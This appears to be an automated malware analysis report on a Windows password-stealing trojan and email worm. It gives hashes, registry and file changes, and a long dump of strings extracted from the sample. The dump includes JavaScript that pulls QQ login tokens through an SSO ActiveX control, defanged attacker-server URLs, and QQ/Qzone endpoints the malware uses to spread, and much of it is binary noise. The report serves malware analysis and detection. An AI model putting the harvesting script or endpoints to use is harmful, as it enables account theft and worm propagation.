Gen.Variant.Strictor.63752_6abf74f4a5
Gen:Variant.Strictor.63752 (B) (Emsisoft), Gen:Variant.Strictor.63752 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: 6abf74f4a5fd08588a38233bcc68a638
SHA1: 56e51d96bb245e663b6389b837da60e911650431
SHA256: aadbb3ff25ff46f954e8c6c46ea4dd86e004f1e431ecaa90b3bae989962da41d
SSDeep: 49152:h4826bcwOFedvlBfvcUFtoFZrjGhj5cckOHTADeGHqtQ0XL3kkDSuM1bSAUTlFTD:hT26wXCvlxdtwXMyckOzYeGH10XorupD
Size: 2940928 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-28 21:50:29
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan-PSW. Trojan program intended for stealing users passwords.
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:3832
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\jedata.dll (178 bytes)
C:\Ƥ·ô.she (7 bytes)
Registry activity
The process %original file name%.exe:3832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\6abf74f4a5fd08588a38233bcc68a638_RASAPI32]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
114054313070472cd1a6d7d28f7c5002 | c:\jedata.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: CF???????
Product Version: 2.5.2.9
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.5.2.9
File Description: ??:www.cf6690.com
Comments: ??:www.cf6690.com
Language: Russian (Russia)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1170138 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1175552 | 3041816 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 4218880 | 556401 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 4775936 | 41256 | 24576 | 3.26023 | 18f0ff638b89f5e0a3b52918814bb6ce |
.vmp0 | 4820992 | 110976 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.tls | 4935680 | 24 | 4096 | 0 | 620f0b67a91f7f74151bc5be745b7110 |
.vmp1 | 4939776 | 2902013 | 2904064 | 5.49027 | a09091bef0944d7b2d554bb83371cfc8 |
.reloc | 7843840 | 144 | 4096 | 0.171165 | ca0f429c888490b6c2e75a8b8f9e6ae3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
www.cf6689.com | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
@.vmp0
`.tls
.vmp1
.reloc
t$(SSh
~%UVW
u.hX8
u$SShe
JHw2.Hw
atl.dll
wininet.dll
gdiplus.dll
ole32.dll
kernel32.dll
jedata.dll
shlwapi.dll
advapi32.dll
OLEACC.DLL
Kernel32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GdiplusShutdown
{B6F7542F-B8FE-46a8-9605-98856A687097}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
42305932-06E6-47a5-AC79-8BDCDC58DF61
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
&keyindex=9&pt_aid=46000101&daid=6&low_login_enable=1&low_login_hour=720&u1=http://t.qq.com
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
p_uin=; p_skey=; pt4_token=;
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
hXXp://VVV.cf6689.com/inc/checkcode.asp
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
hXXp://VVV.cf6689.com/inc/gg.txt
&shorturl=&opt=0
hXXp://is.gd/create.php
4@&alias=&access_type=web
hXXp://VVV.dwz.cn/create.php
http:\/\/VVV.dwz.cn\/
hXXp://VVV.dwz.cn/
hXXp://share.v.t.qq.com/index.php?c=share&a=index&title=&url=
hXXp://url.cn/
hXXp://VVV.rdcnzz.com/v1/data/link_conv/rd_dispatcher.php?orig_link=
hXXp://VVV.baid.us/?url=
spreadurl" href="
&password=
hXXp://VVV.cf6689.com/qqcf_dl.asp?Action=login
&Submit52=ÐÞ¸Ä
hXXp://VVV.cf6689.com/qqcf_Manage.asp?action=usermodifypaysave
hXXp://VVV.cf6689.com/qqcf_Manage.asp
password334" value="
@ping 127.0.0.1 -n
del Restart.bat
\Restart.bat
hXXp://VVV.cf6689.com/inc/tg.txt
Client.exe
\tcls\Client.exe
\Msimg32.dll
@.reloc
crossfire.exe
user32.dll
VVV.cf6689.com
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
simg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
#include "l.chs\afxres.rc" // Standard components
<,=)?4?^?|?
2 2/2K2s2
4O4
>,?0?4?8?
6#6(686>6
9'9 :2:~:
0!0%0)0-010?0
8Ÿ9
2$2(20242
> >$>(>,>0>4>8>
VVV.cf6689.com/gx/vip.txt
Msig32.dll
\pass
\jedata.dll
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
SkinH_EL.dll
_yhXXp://VVV.cf6689.com/gx/banben.txt
VVV.cf6690.com
&button=Ìá½»
hXXp://VVV.cf6689.com/gx/denglu.asp
hXXp://buy.szf40.com/buy/step3.asp
hXXp://buy.szf40.com/pay/ekaunion/Result2.asp?orderid=
images/load2.gif
&Submit=¶©µ¥²éѯ
hXXp://buy.szf40.com/admin/meber1.asp?action=search&wanjia=
&Submit=ÉêÇëÕ˺Å
&password2=
hXXp://VVV.cf6689.com/reg1.asp?action=regeditsave
hXXp://VVV.cf6689.com/qqcf_dl.asp?Action=login
cfindex.asp
hXXp://VVV.cf6689.com/qqcf_Regedit.asp?action=regeditsave
hXXp://login.pp.cc/login/plogin?u=999988&p=c025cdc28257ac5dab50e39a9eabc4c5&_=0.
hXXp://t.pp.cc/member.php?mod=account&action=select&type=tencent&app=timer&referer=/timer/index.php?mod=send&action=index
id=nick_
hXXp://login.pp.cc/logout.html?redirect=hXXp://t.pp.cc/logout.php
hXXp://t.pp.cc
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
@.exe
C:\2014
C:\2014
&keyindex=9&pt_aid=1006102&daid=1&u1=http://id.qq.com/index.html
hXXp://id.qq.com
&ua=Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0&random=0.16163497824410267&g_tk=
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
skey=@
0@hXXp://qun.qzone.qq.com/cgi-bin/group_share_upload?g_tk=
&capacityAll=
&capacity=
qzreferrer=http://qun.qzone.qq.com/ht/share/uploadFile.html?type=1&groupid=
Referer: hXXp://qun.qzone.qq.com/ht/share/uploadFile.html?type=1&groupid=
key":"
:8080/crossdomain.xml
&filekey=
:8080/ftn_handler/?ver=12345&ukey=
hXXp://qun.qzone.qq.com/cgi-bin/group_share_list?uin=
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
hXXp://api.t.qq.com/old/publish.php
&startTime=1382054621443&endTime=1382054622851&countType=&viewModel=&attips=&pic=&apiType=14&pgv_ref=web.base.master.talkBox.btnApolloMyHome&syncQzone=0&syncQQSign=0&adRich=0&g_tk=
"msg":"
skey=@
hXXp://api.t.qq.com/old/follow.php
&veriCode=&lieuId=&apiType=14&apiHost=http://api.t.qq.com&g_tk=
Referer:hXXp://api.t.qq.com/proxy.html
msg:'
hXXp://follow.v.t.qq.com/index.php?c=follow&a=quick&name=
&veriCode=&surl=
hXXp://stat.324324.cn/turl.php?url=
<script>parent.parse('
{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
{D30C1661-CDAF-11d0-8A3E-00C04FC9E26E}
document.all.resultjs.innerText=
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
return binl2hex(core_md5(str2binl(A), A.length * chrsz))
return binl2str(core_md5(str2binl(A), A.length * chrsz))
for (var C = 0; C < K.length; C = 16) {
for (var B = 0; B < D.length * chrsz; B = chrsz) {
C[B >> 5] |= (D.charCodeAt(B / chrsz) & A) << (B % 32)
for (var B = 0; B < C.length * 32; B = chrsz) {
D = String.fromCharCode((C[B >> 5] >>> (B % 32)) & A)
for (var A = 0; A < C.length * 4; A ) {
D = B.charAt((C[A >> 2] >> ((A % 4) * 8 4)) & 15) B.charAt((C[A >> 2] >> ((A % 4) * 8)) & 15)
for (var i = 0; i < str.length; i = i 2) {
arr.push("\\x" str.substr(i, 2))
arr = arr.join("");
&css=hXXp://imgcache.qq.com/ptcss/b2/sjpt/549000912/qzonelogin_ptlogin.css&mibao_css=m_qzone&aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=1&h=1&from_ui=1&dumy=&fp=loginerroralert&action=10-77-43469&g=1&t=1&dummy=&js_type=2&js_ver=10009
hXXp://ptlogin2.qq.com/login?ptlang=2052&u=
','','0','
hXXp://check.ptlogin2.qq.com/check?uin=
function time(){return Math.random()}
hXXp://captcha.qq.com/getimage?aid=549000912&r=
hXXp://b1.cnc.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
&secverifykey=28Q1206
&html=&CSRFToken=feb44554&threadSubmit=trueqzreferrer=http://cnc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=¸öÈËÈÕ¼Ç&title=hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=&pfid=2&qz_ver=6&appcanvas=0&qz_style=v6/11¶ms=&entertime=1366986032906&canvastype=home&con=qzreferrer=http://cnc.qzs.qq.com/qzone/app/mood_v6/html/index.html?mood#uin=hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=&share2weibo=0&onekey=0&comment=1&entryuin=qzreferrer=http://cnc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=hXXp://b1.cnc.qzone.qq.com/cgi-bin/blognew/quote_blog?g_tk=&cateName=¸öÈËÈÕ¼Ç&rightType=1&force=0&source=34&iNotice=1&inCharset=gbk&outCharset=gbk&format=fs&ref=qzone&json=1&g_tk=&styledm=cnc.qzonestyle.gtimg.cn&imgdm=cnc.qzs.qq.com&bdm=b.cnc.qzone.qq.com&mode=2&numperpage=15&property=GoRE×tamp=1381485161&dprefix=cnc.&ref=qzone&page=1&refererurl=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=&blogid=qzreferrer=http://b1.cnc.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=%26pfid%3D2%26qz_ver%3D6%26appcanvas%3D0%26qz_style%3Dv6%2F3%26params%3D%26entertime%3D1364397420605%26canvastype%3Dhome&tid=/infocenter#!app=311&url=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fmood_v6%2Fhtml%2Findex.html%3Fmood%23uin%3Dqzreferrer=http://user.qzone.qq.com/hXXp://taotao.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=hXXp://m.qzone.qq.com/cgi-bin/new/add_msgb?ref=qzone&g_tk=qzreferrer=http://cnc.qzs.qq.com/qzone/msgboard/msgbcanvas.html#page=1&content=hXXp://flower.qzone.qq.com/fcg-bin/cgi_planthXXp://taotao.qq.com/cgi-bin/emotion_cgi_addcomment_ugc?g_tk=&pfid=2&qz_ver=6&appcanvas=0&qz_style=v6/12¶ms=&entertime=1366982902078&canvastype=&uin=hXXp://m.qzone.qq.com/cgi-bin/new/mod_hostword?g_tk=[/img][/ft][/B]&format=fs&iNotice=1&inCharset=gbk&outCharset=gbk&ref=qzone&json=1&g_tk=[img,&content=[B] [ft=#f16d7e,,]qzreferrer=http://cnc.qzs.qq.com/qzone/msgboard/msgbcanvas.html#page=1&hostUin=BMhXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=qzreferrer=http://ctc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&random=0&url=hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=&sendparam=&description=&type=5&url=hXXp://xa.photo.qq.com/cgi-bin/common/cgi_add_album_v2?g_tk=qzreferrer=http://cnc.qzs.qq.com/qzone/photo/zone/addAlbum.html&inCharset=gbk&outCharset=gbk&hostUin=hXXp://shuo.kjkl8.com/taotao.php?qq=hXXp://rq.kjkl8.com/getrz.php?qq=hXXp://up.qzone.qq.com/cgi-bin/cgi_cut_portrait_up?uin=s=0&msg=0hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=&zb_url=http://i.gtimg.cn/qzone/space_item/pre/12/93164_1.gif&curkey=http://user.qzone.qq.com/&unikey=http://user.qzone.qq.com//&appid=7030&face=0&fupdate=1&from=1&query_count=200&opuin=hXXp://w.cnc.qzone.qq.com/cgi-bin/tfriend/friend_addfriend.cgi?g_tk=&flag=0&groupId=0&chat=&key=&im=0&g_tk=&sid=0&from_source=0&from=7&sid=0&ouin=qzreferrer=http://cnc.qzs.qq.com/qzone/v6/friend_manage/addfriend/index.html#ouin=hXXp://w.cnc.qzone.qq.com/cgi-bin/tfriend/specialcare_set.cgi?g_tk=qzreferrer=http://cnc.qzs.qq.com/qzone/v8/ic/care/add_care.html?defaultTab=undefined&uin=hXXp://drift.qzone.qq.com/cgi-bin/sendgift?g_tk=qzreferrer=http://cnc.qzs.qq.com/qzone/gift/send_list.html?uin=&type=&birthday=&birthdaytab=0&lunarFlag=0&source=&nick=&giveback=&popupsrc=301#html=send_list&fupdate=1&random=0.12670858698642817&charset=utf-8&uin=hXXp://r.qzone.qq.com/cgi-bin/tfriend/cgi_like_check_and_getfansnum.cgi?uin=hXXp://open.qzone.qq.com/doLike?g_tk=&url=http://user.qzone.qq.com/skey=Content-Disposition: form-data; name="skey"[skey]Referer: hXXp://ctc.qzs.qq.com/qzone/client/photo/swf/SimpleLocalFileUploader/Main.swf?_r=0.4510277210256217User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)hXXp://route.store.qq.com/GetRoute?UIN=,1,366,493,,366,493&special_url=&subrichtype=1&pic_bo=&pfid=2&qz_ver=8&appcanvas=0&qz_style=88¶ms=&entertime=1385666888977&canvastype=&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=,V1192fit0DxWRa,hXXp://qun.qq.com/cgi-bin/add_group&msg=hXXp://w49.mail.qq.com/cgi-bin/cgi_redirect&RedirectZ3JvdXBtYWlsX3NlbmQ/bW9iaWxlc2VuZD0x=å‘é€&sid=&content=@groupmail.qq.com&subject=hXXp://admin.qun.qq.com/cgi-bin/qun_admin/create_group&s=1&open=0&speak=0&key=value&vc=&t=1&v=2&gClsTxt=&mn=0&pos=10272|119.527082|26.659240|&m=&bkn=hXXp://captcha.qq.com/getimage?aid=3000801&t=1375198200434hXXp://qun.qzone.qq.com/cgi-bin/group_share_feed?g_tk=hXXp://bbs.qun.qq.com/forumdisplay?gId=var S_NICK_URL = "hXXp://qgc.qq.com/&fContent=jumpURL":"hXXp://face1.qun.qq.com/cgi/svr/face/getface?type=4&fid=2001&uin=&1381502173881hXXp://captcha.qq.com/getimage?aid=hXXp://qun.qzone.qq.com/cgi-bin/feeds/publish_feedhXXp://qun.qzone.qq.com/cgi-bin/feeds/get_vinfohXXp://qun.qzone.qq.com/cgi-bin/get_group_member?uin=nick":"(.*?)","uin":(.*?)},hXXp://qun.qq.com/cgi-bin/group_searchVBScript.RegExpAdobe Photoshop CS5 Windows2013:12:31 18:39:54urlTEXTMsgeTEXT#hXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-12-31T16:42:39 08:00" xmp:ModifyDate="2013-12-31T18:39:54 08:00" xmp:MetadataDate="2013-12-31T18:39:54 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:42E9777E0572E311BF838C14447BAAB2" xmpMM:DocumentID="xmp.did:41E9777E0572E311BF838C14447BAAB2" xmpMM:OriginalDocumentID="xmp.did:41E9777E0572E311BF838C14447BAAB2"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:41E9777E0572E311BF838C14447BAAB2" stEvt:when="2013-12-31T16:42:39 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:42E9777E0572E311BF838C14447BAAB2" stEvt:when="2013-12-31T18:39:54 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>IEC hXXp://VVV.iec.ch.IEC 61966-2.1 Default RGB colour space - sRGBCRT curv2014:01:08 22:21:17hXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-08T22:21:17 08:00" xmp:ModifyDate="2014-01-08T22:21:17 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:A515E5A26D78E3118575E6F7532274FE" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:691C5B166778E3118575E6F7532274FE" stEvt:when="2014-01-08T21:57:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:9D15E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:15:51 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A415E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:21:17 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A515E5A26D78E3118575E6F7532274FE" stEvt:when="2014-01-08T22:21:17 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A415E5A26D78E3118575E6F7532274FE" stRef:documentID="xmp.did:DD92D9186678E3119905BAC7617B8686" stRef:originalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:DD92D9186678E3119905BAC7617B8686</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>.Exif2014:01:20 03:43:54\hXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T21:15:42 08:00" xmp:MetadataDate="2014-01-20T03:43:54 08:00" xmp:ModifyDate="2014-01-20T03:43:54 08:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:129794074281E311B87BF5348FEEC9C0" xmpMM:DocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" xmpMM:OriginalDocumentID="xmp.did:DD92D9186678E3119905BAC7617B8686" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DD92D9186678E3119905BAC7617B8686" stEvt:when="2014-01-08T21:15:42 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li 